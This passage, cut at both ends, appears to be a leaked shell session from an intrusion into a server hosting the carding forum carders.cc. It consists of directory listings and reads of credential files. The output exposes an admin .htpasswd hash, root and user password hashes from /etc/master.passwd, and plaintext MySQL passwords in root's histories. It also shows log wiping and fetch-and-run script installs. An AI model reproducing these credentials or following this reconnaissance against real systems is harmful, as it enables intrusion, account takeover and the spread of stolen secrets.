ssi_examples.php +-rwxrwxrwx 1 carderscc www 5.8K Apr 25 12:55 ssi_examples.shtml +-rwxrwxrwx 1 carderscc www 9.9K Apr 25 12:55 subscriptions.php + +~$ cat Settings.php + + +~$ ls -lah .. +total 624 +drwxrwx--- 7 carderscc www 2.0K May 2 06:09 . +drwxr-x--- 6 carderscc www 512B Apr 27 02:11 .. +-rw-r--r-- 1 root www 54B May 2 05:54 .htacces_bullen +-rw-r--r-- 1 root www 142K May 4 15:31 .htaccess +drwxr-xr-x 4 root www 512B Feb 27 16:58 admin +-rw-r--r-- 1 root www 142K May 2 06:07 backup_.htaccess +drwxr-xr-x 2 carderscc www 1.0K Apr 28 16:15 banner +drwxr-xr-x 2 carderscc www 512B Mar 15 01:16 blocked +-rw-r--r-- 1 carderscc www 2.8K Mar 4 12:33 favicon.ico +drwxrwxrwx 9 carderscc www 1.0K May 5 10:42 forum +drwxr-xr-x 5 carderscc www 512B Mar 3 13:26 images +-rw-r--r-- 1 root www 261B Apr 23 18:06 index.html +-rw-r--r-- 1 carderscc carderscc 472B Mar 12 11:44 whitelist.html + +~$ ls -lah ../admin +total 28 +drwxr-xr-x 4 root www 512B Feb 27 16:58 . +drwxrwx--- 7 carderscc www 2.0K May 2 06:09 .. +-rw-r--r-- 1 root www 160B Feb 14 05:01 .htaccess +-rw-r--r-- 1 root www 20B Feb 14 05:01 .htpasswd +drwxrwxrwx 12 carderscc carderscc 1.0K Mar 1 03:25 dumper +drwxr-xr-x 10 root www 2.5K Feb 14 05:03 phpmyadmin + +~$ cat ../admin/.htaccess +AuthUserFile /home/carderscc/carders.cc/admin/.htpasswd +AuthGroupFile /dev/null +AuthName "Admistration" +AuthType Basic + +require valid-user + + +~$ cat ../admin/.htpasswd +admin:ghR4XH02ye1tc + +~$ ls -lah /home +total 16 +drwxr-x--x 4 root wheel 512B Mar 10 18:06 . +drwxr-xr-x 18 root wheel 512B Apr 23 16:08 .. +drwxr-x--- 6 carderscc www 512B Apr 27 02:11 carderscc +drwxr-x--- 4 vpn24 www 512B Mar 10 18:10 vpn24 + +~$ ls -lah /home/carderscc +total 52 +drwxr-x--- 6 carderscc www 512B Apr 27 02:11 . +drwxr-x--x 4 root wheel 512B Mar 10 18:06 .. +drwxr-xr-x 2 carderscc www 512B Jan 18 22:35 .auth +drwxrwx--- 7 carderscc www 2.0K May 2 06:09 carders.cc +drwxrwx--- 3 carderscc www 512B Jan 24 12:36 jabber.carders.cc +drwxrwx--- 2 carderscc www 15K May 5 11:16 temp + +~$ ls -lah /home/carderscc/.auth +total 8 +drwxr-xr-x 2 carderscc www 512B Jan 18 22:35 . +drwxr-x--- 6 carderscc www 512B Apr 27 02:11 .. +-r-xr-x--- 1 carderscc www 0B Jan 18 22:37 .htpasswd + +~$ cat /home/carderscc/.auth/.htpasswd + +~$ # :( + +~$ ls -lah /home/vpn24 +total 16 +drwxr-x--- 4 vpn24 www 512B Mar 10 18:10 . +drwxr-x--x 4 root wheel 512B Mar 10 18:06 .. +drwxrwx--- 2 vpn24 www 512B Mar 10 18:10 temp +drwxrwx--- 3 vpn24 www 512B Mar 10 18:13 vpn24.biz + +~$ ls -lah /home/vpn24/vpn24.biz +total 16 +drwxrwx--- 3 vpn24 www 512B Mar 10 18:13 . +drwxr-x--- 4 vpn24 www 512B Mar 10 18:10 .. +drwxr-xr-x 2 vpn24 vpn24 512B Mar 10 18:10 cgi-bin +-rw-r--r-- 1 vpn24 www 1.0K May 2 05:40 index.html + +~$ ls -lah /home/vpn24/vpn24.biz/cgi-bin +total 8 +drwxr-xr-x 2 vpn24 vpn24 512B Mar 10 18:10 . +drwxrwx--- 3 vpn24 www 512B Mar 10 18:13 .. + +~$ # not so cool actually .. + +~$ ls -lah / +total 101 +drwxr-xr-x 18 root wheel 512B Apr 23 16:08 . +drwxr-xr-x 18 root wheel 512B Apr 23 16:08 .. +-rw-r--r-- 1 root wheel 793B Jan 1 2009 .cshrc +-rw-r--r-- 1 root wheel 260B Jan 1 2009 .profile +-r--r--r-- 1 root wheel 6.0K Jan 1 2009 COPYRIGHT +drwxr-xr-x 2 root wheel 1.0K May 4 20:15 bin +drwxr-xr-x 7 root wheel 512B Jan 1 2009 boot +dr-xr-xr-x 4 root wheel 512B Feb 15 11:44 dev +drwxr-xr-x 23 root wheel 2.5K May 4 20:11 etc +drwxr-x--x 4 root wheel 512B Mar 10 18:06 home +drwxr-xr-x 3 root wheel 1.5K Jan 1 2009 lib +drwxr-xr-x 2 root wheel 512B Jan 1 2009 libexec +drwxr-xr-x 2 root wheel 512B Jan 1 2009 media +drwxr-xr-x 2 root wheel 512B Jan 1 2009 mnt +dr-xr-xr-x 1 root wheel 0B May 5 11:15 proc +drwxr-xr-x 2 root wheel 2.5K Jan 1 2009 rescue +drwxr-xr-x 8 root wheel 1.0K May 4 18:55 root +drwxr-xr-x 2 root wheel 2.5K Jan 1 2009 sbin +lrwxr-xr-x 1 root wheel 11B Jan 1 2009 sys -> usr/src/sys +drwxrwxrwt 8 root wheel 512B May 5 11:13 tmp +drwxr-xr-x 12 root wheel 512B May 28 2009 usr +drwxr-xr-x 22 root wheel 512B Apr 24 21:31 var + +~$ cat /etc/passwd +# $FreeBSD: src/etc/master.passwd,v 1.40.18.1 2008/11/25 02:59:29 kensmith Exp $ +# +root:*:0:0:Charlie &:/root:/bin/csh +toor:*:0:0:Bourne-again Superuser:/root: +daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5:System &:/:/usr/sbin/nologin +bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8:News Subsystem:/:/usr/sbin/nologin +man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +carderscc:*:1000:1000:User &:/home/carderscc:/sbin/nologin +vpn24:*:1001:1001:User &:/home/vpn24:/sbin/nologin +lsadm:*:1002:1002:User &:/:/usr/sbin/nologin +_ntp:*:123:123:NTP Daemon:/var/empty:/usr/sbin/nologin + +~$ cat /etc/master.passwd +# $FreeBSD: src/etc/master.passwd,v 1.40.18.1 2008/11/25 02:59:29 kensmith Exp $ +# +root:$1$W4A6ZjA/$BQL.I4wtUOfyV7OpHG6W1.:0:0::0:0:Charlie &:/root:/bin/csh +toor:*:0:0::0:0:Bourne-again Superuser:/root: +daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5::0:0:System &:/:/usr/sbin/nologin +bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin +man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125::0:0:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +carderscc:$1$ssZ6DY2y$bm3wEpsDLES9x38TMjTS7.:1000:1000::0:0:User &:/home/carderscc:/sbin/nologin +vpn24:$1$VbOqVb0O$iu8QCXuCuHZ8iyNckzbjd1:1001:1001::0:0:User &:/home/vpn24:/sbin/nologin +lsadm:*:1002:1002::0:0:User &:/:/usr/sbin/nologin +_ntp:*:123:123::0:0:NTP Daemon:/var/empty:/usr/sbin/nologin + +~$ ls -lah /root +total 37692 +drwxr-xr-x 8 root wheel 1.0K May 4 18:55 . +drwxr-xr-x 18 root wheel 512B Apr 23 16:08 .. +-rw------- 1 root wheel 4.0K Apr 20 15:00 .bash_history +-rw-r--r-- 1 root wheel 793B Jan 1 2009 .cshrc +-rw------- 1 root wheel 2.8K May 4 19:56 .history +-rw-r--r-- 1 root wheel 151B Jan 1 2009 .k5login +-rw------- 1 root wheel 45B May 4 18:52 .lesshst +-rw-r--r-- 1 root wheel 299B Jan 1 2009 .login +-rw------- 1 root wheel 48K May 2 21:11 .mysql_history +-rw-r--r-- 1 root wheel 260B Jan 1 2009 .profile +-rw------- 1 root wheel 1.0K Mar 11 00:10 .rnd +drwx------ 2 root wheel 512B May 4 18:02 .ssh +-rw-r--r-- 1 root wheel 640K Sep 22 2009 MySQLDumper1.24stable.zip +drwxr-xr-x 4 root wheel 512B Apr 24 20:27 ZendOptimizer-3.3.0a-freebsd6.0-amd64 +-rw-r--r-- 1 root wheel 9.5M Apr 24 20:27 ZendOptimizer-3.3.0a-freebsd6.0-amd64.tar.gz +drwxr-xr-x 11 root wheel 512B Jan 25 17:03 greensql-fw-1.2.2 +-rw-r--r-- 1 root wheel 210K Feb 16 05:04 greensql-fw-1.2.2.tar.gz +-rw-r--r-- 1 root wheel 399B May 4 16:39 id_rsa.pub +-rwxrwxrwx 1 root wheel 2.0K May 2 03:08 logclear.sh +drwxr-xr-x 12 root wheel 512B Mar 11 00:07 lsws-4.0.13 +-rw-r--r-- 1 root wheel 3.1M Feb 19 22:18 lsws-4.0.13-ent-x86_64-freebsd6.tar.gz +-rw------- 1 root wheel 1.2M Feb 10 03:20 mbox +drwxr-xr-x 2 root wheel 512B Jan 18 20:57 msd1.24stable +drwxr-xr-x 2 root wheel 2.5K Jan 18 20:24 phpMyAdmin-3.2.5-all-languages +-rw-r--r-- 1 root wheel 3.5M Jan 10 12:22 phpMyAdmin-3.2.5-all-languages.tar.gz + +~$ cat /root/.bash_history +top +ls +top +make +make install clean +make install clean +mc +pinf ya.ru +ping ya.ru +top +mc +jls +touch proftpd.passwd +chmod go-rwx proftpd.passwd +ls -la +./sshd start +top +top +make +make install clean +make install clean +make deinstall +./apache22 start +make install clean +make install clean +./apache22 start +./apache22 start +sh ./rc.local +./apache22 restart +top +./mysql-server start +top +killall sendmail +./sendmail restart +./postfix start +./apache22 restart +top +top +./install.sh +./upgrade.pl +top +sockstat -l4 +./postfix restart +top +./upgrade.pl +top +ftptop +top +./apache22 start +top +./upgrade.pl +touch index.php +sockstat -l4|grep ftp +killall proftpd +killall proftpd +./proftpd start +./proftpd stop +top +./proftpd start +top +ftptop +ls -la +chmod o-r home +mc +ifconfig +killall httpd +mc +ttop +top +rm -R ports +top +mc +portsnap fetch extract +ifconfig +ping ya.ru +ping 92.241.164.1 +ping -i0.1 92.241.164.1 +ping ya.ru +make install clean +make install clean +make config +make clean +make install clean +make deinstall +make install +make clean +top +uname -a +top +portsnap fetch extract +mc +portupgrade -aRf --batch +pkg_version +mc +mc +make install clean +php +php --version +top +top +php --version +mc +./apache22 restart +top +make install clean +ifconfig +ifconfig inet | grep inet +ifconfig -a inet | grep inet +ifconfig -a inet | grep inet | awk "{print $2}" +ifconfig -a inet | grep inet | sed "{print $2}" +ifconfig -a inet | grep inet | sed "{print $2}" +ifconfig -a inet | grep inet | sed "{'print $2'}" +ifconfig -a inet | grep inet | sed {'print $2'} +ifconfig -a inet | grep inet | sed { print $2 } +ifconfig -a inet | grep inet | sed '{ print $2 }' +ifconfig -a inet | grep inet | awk '{ print $2 }' +mc +mc +top +killall httpd +mc +mc +mc +mc +top +ifconfig +mc +top +mc +tail -f /var/log/httpd/httpd_access.log +top +top +sockstat -l4 +top +c +mc +top -S +sockstat -l4 +ps ax +ps ax +sockstat -l4 +cd /home +ls -l +cd carderscc/ +ls -l +cd carders.cc/ +ls -l +top +sockstat -l4 +mc +top -S +top +mc +passwd +ps ax +ssh localhost +ifconfig +vi //etc/ssh/sshd_config +vipw +passwd +passwd +ping exd.ru +midc +ps ax | grep nginx +exit +ps ax +tail -f /var/log/httpd//httpd_access.log +vi /usr/local/etc/apache22/httpd.conf +/usr/local/etc/rc.d/apache22 restart +tail -f /var/log/httpd//httpd_access.log +top +vi /usr/local/etc/apache22/httpd.conf +/usr/local/etc/rc.d/apache22 restart +ps ax +top +top +top +mc +top +sockstat -l4 +top +mysql +mc +sockstat -c4 +sockstat -c4 +sockstat -c4 +sockstat -c4 +sockstat -c4 +sockstat -c4 +sockstat -c4 +sockstat -c4 +top +jls +top +mc +mysql -p`cat /etc/my.passwd` +last +mysql -p`cat /etc/my.passwd` +mc +ps ax +vi /usr/local/etc/apache22/httpd.conf +/usr/local/etc/rc.d/apache22 restart +vi /usr/local/etc/apache22/httpd.conf +/usr/local/etc/rc.d/apache22 restart +ps ax +/usr/local/etc/rc.d/apache22 restart +sockstat -l4 +/usr/local/etc/rc.d/apache22 start +tail -f /var/log/httpd//httpd_access.log +tail -f /var/log/httpd//httpd_access.log +top +ps ax +top +tail -f /var/log/httpd//httpd_access.log +ps ax +ps ax +top +ps ax +tail -f /var/log/httpd//httpd_access.log +tail -f /var/log/httpd//httpd_access.log +ifconfig +ping mail.ru +ps ax +ps ax +tail -f /var/log/httpd//httpd_access.log +top +vi /usr/local/etc/nginx/nginx.conf +ps ax +top -mio +ps ax +apachectl restart +top -S +sockstat -c4|w c-l +sockstat -c4|wc -l +sockstat -c4 +mysql -p`cat /etc/my.passwd` +mc +mcedit /etc/my.cnf +/usr/local/etc/rc.d/mysql-server restart +sockstat +sockstat | grep 3304 +sockstat | grep 3306 +exit +top +mc +ps ax +tail -f /var/log/httpd//httpd_access.log +mcedit /usr/local/etc/apache22/httpd.conf +tail -f /var/log/httpd//httpd_access.log +mcedit /usr/local/etc/apache22/httpd.conf +/usr/local/etc/rc.d/apache22 restart +tail -f /var/log/httpd//httpd_access.log +cat /var/log/httpd/httpd_access.log | grep "17:09:49" +cat /var/log/httpd/httpd_access.log | grep "17:09:49" | wc -l +cat /var/log/httpd/httpd_access.log | grep "17:09:50" | wc -l +tail -f /var/log/httpd//httpd_access.log +tail -f /var/log/httpd//httpd_access.log +tail -f /var/log/httpd//httpd_access.log +tail -f /var/log/httpd//httpd_access.log +tail -f /var/log/httpd//httpd_access.log +exit +ps ax +top +/usr/local/etc/rc.d/proftpd restart +exit +mc +mc +cat /dev/null > /var/log/auth.log + +~$ cat /root/.history +#+1272999089 +wget http://www.inetbase.com/scripts/ddos/install.sh +#+1272999094 +fetch http://www.inetbase.com/scripts/ddos/install.sh +#+1272999099 +chmod 0700 install.sh +#+1272999102 +./install.sh +#+1272999140 +ls +#+1272999143 +cd /usr/local/ddos/ +#+1272999145 +ls +#+1272999158 +/root/install.sh +#+1272999168 +cd /root/ +#+1272999171 +fetch http://www.inetbase.com/scripts/ddos/uninstall.ddos +#+1272999177 +chmod 777 uninstall.ddos +#+1272999179 +./uninstall.ddos +#+1272999186 +chmod 777 install.sh +#+1272999194 +./install.sh +#+1272999208 +cd /usr/local/ddos/ +#+1272999209 +ls +#+1272999303 +ls +#+1272999306 +cd /root/ +#+1272999307 +rm install.sh +#+1272999309 +rm uninstall.ddos +#+1272999316 +fetch http://www.inetbase.com/scripts/ddos/uninstall.ddos +#+1272999319 +chmod 777 uninstall.ddos +#+1272999322 +./uins +#+1272999326 +./uinstall.ddos +#+1272999327 +ls +#+1272999336 +chmod 777 uninstall.ddos +#+1272999336 +ls +#+1272999340 +./uninstall.ddos +#+1272999343 +rm uninstall.ddos +#+1272999343 +clear +#+1272999344 +ls +#+1272999608 +ipfw list +#+1272999807 +cd /usr/local +#+1272999807 +ls +#+1272999810 +cd libexec/ +#+1272999810 +ls +#+1272999814 +cd apache22/ +#+1272999814viola +ls +#+1272999833 +ps ax +#+1273000072 +top +#+1273000748 +cd /etc/firewall +#+1273000786 +nano /etc/rc.conf +#+1273000802 +nano /etc/rc.conf +#+1273000827 +mkdir /etc/firewall +#+1273000834 +nano /etc/firewall/rules +#+1273000869 +chmod 750 /etc/firewall/rules +#+1273000880 +ipfw2 +#+1273000882 +ipfw +#+1273000884 +ipfw h +#+1273000885 +ipfw -h +#+1273000890 +ipfw /etc/firewall/rules +#+1273000894 +ipfw +#+1273000899 +ipfw show +#+1273000906 +nano /etc/rc.conf +#+1273001039 +cd /usr/ports +#+1273001039 +ls +#+1273001041 +cd security/ +#+1273001045 +cd .. +#+1273001046 +cd german/ +#+1273001047 +ls +#+1273001050 +cd .. +#+1273001051 +ls +#+1273001056 +cd security/ +#+1273001056 +ls +#+1273001099 +nano /etc/firewall.sh +#+1273001121 +chmod 777 /etc/firewall.sh && chown root:wheel /etc/firewall.sh +#+1273001127 +nano /etc/rc.conf +#+1273001146 +./etc/firewall.sh +#+1273001150 +/etc/firewall +#+1273001151 +/etc/firewall.s +#+1273001152 +/etc/firewall.sh +#+1273001158 +nano firewall.sh +#+1273001165 +nano /etc/firewall.sh +#+1273001211 +/etc/firewall.sh +#+1273001221 +chmod 777 /etc/firewall.sh +#+1273001222 +/etc/firewall.sh +#+1273001228 +nano /etc/firewall.sh +#+1273001240 +kldload +#+1273001243 +kldload ipfw +#+1273001275 +/root/logclear.sh +#+1273001279 +cd /var/log +#+1273001280 +ls +#+1273001281 +cd httpd/ +#+1273001282 +ls +#+1273001285 +nano httpd_access.log +#+1273001317 +nano httpd_access.log +#+1273001423 +/etc/firewall.sh +#+1273001428 +/etc/firewall.sh +#+1273001429 +/etc/firewall.sh +#+1273001441 +/etc/firewall.sh +#+1273001441 +/etc/firewall.sh +#+1273001442 +/etc/firewall.sh +#+1273001442 +/etc/firewall.sh +#+1273001442 +/etc/firewall.sh +#+1273001503 +nano /etc/rc.conf +#+1273001520 +httpd -k restart +#+1273001598 +/etc/firewall.sh +#+1273001800 +/etc/firewall.sh +#+1273002984 +/etc/firewall.sh +#+1273002986 +exit + +~$ cat /root/.mysql_history +CREATE DATABASE ''cms_carders_cc''; +CREATE DATABASE 'cms_carders_cc'; +CREATE DATABASE "cms_carders_cc"; +CREATE DATABASE cms_carders_cc; +GRANT ALL PRIVILEGES ON cms_carders_cc.* TO carderscc_cms@localhost IDENTIFIED BY 3irt328o7tr23ilr32thUFZ732fukdf6; +GRANT ALL PRIVILEGES ON cms_carders_cc.* TO carderscc_cms@localhost IDENTIFIED BY '3irt328o7tr23ilr32thUFZ732fukdf6'; +DROP DATABASE cms_carders_Cc +; +DROP DATABASE cms_carders_cc +; +show processlist; +show databases; +use cms_carders_cc; +show tables; +select * from usr limit 1000; +select * from user limit 1000; +select * from user limit 100; +use mysql; +select * from User; +select * from user; +show processlist; +version() +; +SHOW VERSION(); +version +help +show +list +use +SHOW database +SHOW TABLES +TABLES +ls +help +help; +ls help help; +SHOW DATABASES; +SHOW databases; +use cms_carders_cc +SHOW TABLES +SHOW TABLES; +SHOW TABLES SHOW TABLES; +SHOW TABLES; +mysqldump +help +show databases; +create database smf_carders_cc +; +show databases; +create database smf_carders_cc; +GRANT ALL PRIVILEGES ON smf_carders_cc.* TO 'cms_carders_cc'@'localhost' IDENTIFIED BY 'weuUIGf87fgfui87tZGg832tgfuwztr87g'; +show databases; +USE smf_carders_cc +show tables; +show data; +use table carders_smf_settings; +show table carders_smf_settings; +SELECT carders_smf_settings; +SELECT * FROM carders_smf_settings; +show tables; +UPDATE settings SET attachmentUploadDir='/home/carderscc/carders.cc/new_forum_beta_wtf/attachments', +smileys_dir='/home/carderscc/carders.cc/new_forum_beta_wtf/Smileys', +smileys_url='http://www.carders.cc/new_forum_beta_wtf/Smileys', +avatar_directory='/home/carderscc/carders.cc/new_forum_beta_wtf/avatars', +avatar_url='http://www.carders.cc/new_forum_beta_wtf/avatars'; +UPDATE settings SET attachmentUploadDir='/home/carderscc/carders.cc/new_forum_beta_wtf/attachments', smileys_dir='/home/carderscc/carders.cc/new_forum_beta_wtf/Smileys', smileys_url='http://www.carders.cc/new_forum_beta_wtf/Smileys', avatar_directory='/home/carderscc/carders.cc/new_forum_beta_wtf/avatars', avatar_url='http://www.carders.cc/new_forum_beta_wtf/avatars'; +UPDATE carders_smf_settings SET attachmentUploadDir='/home/carderscc/carders.cc/new_forum_beta_wtf/attachments', smileys_dir='/home/carderscc/carders.cc/new_forum_beta_wtf/Smileys', smileys_url='http://www.carders.cc/new_forum_beta_wtf/Smileys', avatar_directory='/home/carderscc/carders.cc/new_forum_beta_wtf/avatars', avatar_url='http://www.carders.cc/new_forum_beta_wtf/avatars'; +chmod +use smf_carders +show tables; +show databases; +use smf_carders_cc +UPDATE carders_smf_settings SET attachmentUploadDir='/home/carderscc/carders.cc/new_forum_beta_wtf/attachments',smileys_dir='/home/carderscc/carders.cc/new_forum_beta_wtf/Smileys',smileys_url='http://www.carders.cc/new_forum_beta_wtf/Smileys',avatar_directory='/home/carderscc/carders.cc/new_forum_beta_wtf/avatars',avatar_url='http://www.carders.cc/new_forum_beta_wtf/avatars'; +SELECT * FROM carders_smf_settings +; +use smf_carders_cc +UPDATE carders_smf_settings SET `attachmentUploadDir`='/home/carderscc/carders.cc/new_forum_beta_wtf/attachments',smileys_dir='/home/carderscc/carders.cc/new_forum_beta_wtf/Smileys',smileys_url='http://www.carders.cc/new_forum_beta_wtf/Smileys',avatar_directory='/home/carderscc/carders.cc/new_forum_beta_wtf/avatars',avatar_url='http://www.carders.cc/new_forum_beta_wtf/avatars'; +UPDATE carders_smf_settings SET smileys_dir='/home/carderscc/carders.cc/new_forum_beta_wtf/Smileys',smileys_url='http://www.carders.cc/new_forum_beta_wtf/Smileys',avatar_directory='/home/carderscc/carders.cc/new_forum_beta_wtf/avatars',avatar_url='http://www.carders.cc/new_forum_beta_wtf/avatars'; +UPDATE carders_smf_settings SET value='/home/carderscc/carders.cc/new_forum_beta_wtf/attachments' WHERE variable='attachmentUploadDir'; +UPDATE carders_smf_settingss SET value='/home/carderscc/carders.cc/new_forum_beta_wtf/Smileys' WHERE variable='smileys_dir'; +UPDATE carders_smf_settings SET value='http://www.carders.cc/new_forum_beta_wtf/Smileys' WHERE variable='smileys_url'; +UPDATE carders_smf_settings SET value='/home/carderscc/carders.cc/new_forum_beta_wtf/avatars' WHERE variable='avatar_directory'; +UPDATE carders_smf_settings SET value='http://www.carders.cc/new_forum_beta_wtf/avatars' WHERE variable='avatar_url'; +select * from carders_smf_settings +; +select * from carders_smf_settings; +UPDATE carders_smf_settings SET value='/home/carderscc/carders.cc/new_forum_beta_wtf/smileys' WHERE variable='smileys_dir'; +select * from carders_smf_settings; +use smf_carders; +use smf_carders_cc +show tables; +select * From carders_smf_setings +; +SELECT * FROM carders_smf_settings; +use smf_carders_cc +GRANT ALL PRIVILEGES ON smf_carders_cc.* TO 'cms_carders_cc'@'localhost' IDENTIFIED BY 'weuUIGf87fgfui87tZGg832tgfuwztr87g'; +FLUSH PRIVILEGES; +GRANT SELECT, INSERT, DELETE, ALTER, CREATE, DROP, UPDATE ON smf_carders_cc.* TO 'cms_carders_cc'@'localhost' +; +FLUSH PRIVILEGES; +GRANT SELECT, INSERT, DELETE, ALTER, CREATE, DROP, UPDATE ON smf_carders_cc.* TO 'cms_carders_cc'@'localhost' IDENTIFIED BY ' +; +GRANT SELECT, INSERT, DELETE, ALTER, CREATE, DROP, UPDATE ON smf_carders_cc.* TO 'cms_carders_cc'@'localhost' IDENTIFIED BY 'weuUIGf87fgfui87tZGg832tgfuwztr87g'; +; +FLUS PRIVILEGES; +FLUSH PRIVILEGES; +GRANT SELECT, INSERT, DELETE ON smf_carders_cc.* TO cms_carders_cc@'localhost' IDENTIFIED BY 'weuUIGf87fgfui87tZGg832tgfuwztr87g'; +FLUSH PRIVILEGES; +GRANT ALL on smf_carders_cc.* TO 'cms_carders_cc'@'localhost'; +flush privileges; +GRANT ALL on smf_carders_cc.* TO 'cms_carders_cc'@'localhost' WITH GRANT OPTION; +GRANT ALL PRIVILEGES ON smf_carders_cc.* TO 'cms_carders_cc'@'localhost' WITH GRANT OPTION; +flush privileges; +SHOW GRANTS FOR 'cms_carders_cc'@'localhost' +; +GRANT ALL PRIVILEGES ON `smf_carders_cc`.* TO 'cms_carders_cc'@'localhost'; +GRANT ALL PRIVILEGES ON `smf_carders_cc`.* TO 'cms_carders_cc'@'localhost' IDENTIFED BY 'weuUIGf87fgfui87tZGg832tgfuwztr87g'; +GRANT ALL PRIVILEGES ON `smf_carders_cc`.* TO 'cms_carders_cc'@'localhost' IDENTIFIED BY 'weuUIGf87fgfui87tZGg832tgfuwztr87g'; +ls +; +show tables; +use smf_carders_cc +show tables; +GRANT SELECT, INSERT, UPDATE, DELETE, DROP, ALTER, CREATE TEMPORARY TABLES ON smf_carders_cc.* TO cms_carders_cc@localhost; +SHOW grants; +SHOW grants for 'cms_carders_cc' +SHOW grants for 'cms_carders_cc'; +SHOW grants for 'cms_carders_cc' SHOW grants for 'cms_carders_cc'; +SHOW grants for 'cms_carders_cc' SHOW grants for 'cms_carders_cc';; +SHOW grants for 'cms_carders_cc' SHOW grants for 'cms_carders_cc'; +show grants for 'cms_carders_cc' +; +show grants for 'cms_carders_cc'@'localhost'; +GRANT USAGE ON *.* TO 'cms_carders_cc'@'localhost' IDENTIFIED BY PASSWORD 'weuUIGf87fgfui87tZGg832tgfuwztr87g'; +GRANT ALL PRIVILEGES ON smf_carders_cc.* TO 'cms_carders_cc'@'localhost' IDENTIFIED BY PASSWORD 'weuUIGf87fgfui87tZGg832tgfuwztr87g'; +GRANT ALL PRIVILEGES ON smf_carders_cc.* TO 'cms_carders_cc'@'localhost' IDENTIFIED BY 'weuUIGf87fgfui87tZGg832tgfuwztr87g'; +flush privileges; +DROP DATABASE smf_carders_cc +; +ls +; +show databases; +use smf_carders_cc; +show tables; +select * From carders_smf_settings; +use smf_carders_cc; +show tables; +select * From carders_smf_settings; +drop database smf_carders_cc; +show databases; +use smf_carders_cc +ls +; +show tables; +use smf_carders_cc +show tables; +flush tables; +show databases; +drop database smf_carders_cc_backup +; +ls +; +show databases; +use cms_carders_cc; +show tables; +select * from user where username='tr0nix' +; +select username, ipaddress from users limit 10; +select username, ipaddress from user limit 10; +select username, ipaddress from user limit 10 order by username desc; +select username, ipaddress from user order by id desc limit 10; +select username, ipaddress from user order by userid desc limit 10; +use smf_carders_cc +show tables; +select * from carders_smf_members limit 10; +select * from carders_smf_members where member_name like 'tr0nix'; +select * from carders_smf_members where membername like 'tr0nix'; +clear +ls +; +show tables; +show database; +show databases; +use cms_caders_cc +show databases; +use cms_carders_cc; +select * from vas_banners; +show tables; +select * from vsa_banners; +INSERT INTO vsa_banners ('id', 'type', 'title', 'url', 'banner', 'duration', 'width', 'height', 'active', 'bannord') VALUES('6', 'IMAGE', 'Fraud-Genius', 'http://noreferrer.bz/?http://fraud-genius.cc', 'http://img697.imageshack.us/img697/483/banner468x60static1.jpg', '3', '468', '60', '1', '5'); +INSERT INTO vsa_banners (`id`, `type`, `title`, `url`, `banner`, `duration`, `width`, `height`, `active`, `bannord`) VALUES ('6', 'IMAGE', 'Fraud-Genius','http://noreferrer.biz/?http://fraud-genius.cc', 'http://img697.imageshack.us/img697/483/banner468x60static1.jpg', '3', '460', '60', '1', '5'); +use cms_carders_cc; +select * from vsa_banner; +select * from vas_banner; +select * from vas_banners; +select * from vsa_banners; +UPDATE vsa_banners SET url='http://noreferrer.bz/?http://fraud-genius.cc' WHERE id='6'; +show databases; +use cms_carders_cc; +select * from vsa_banners; +UPDATE vsa_banners SET duration='100' WHERE id='6'; +DELETE from vsa_banners WHERE id='6'; +show databases; +drop database smf_carders_cc; +show databases; +create database smf_carders_cc; +use smf_carders_cc; +show tables; +show databases; +use smf_carders_cc; +show tables +; +help +\. /root/smf_carders_cc.sql +use smf_carders_cc; +show tables; +select * from carders_smf_membergroups; +select * from carders_smf_members limit 1; +select additionalGroups from carders_smf_members limit 1; +select additionalGroups from carders_smf_members where memberName like 'Zagerus' +; +select memberName, additionalGroups from carders_smf_members where memberName like 'Zagerus' +; +select 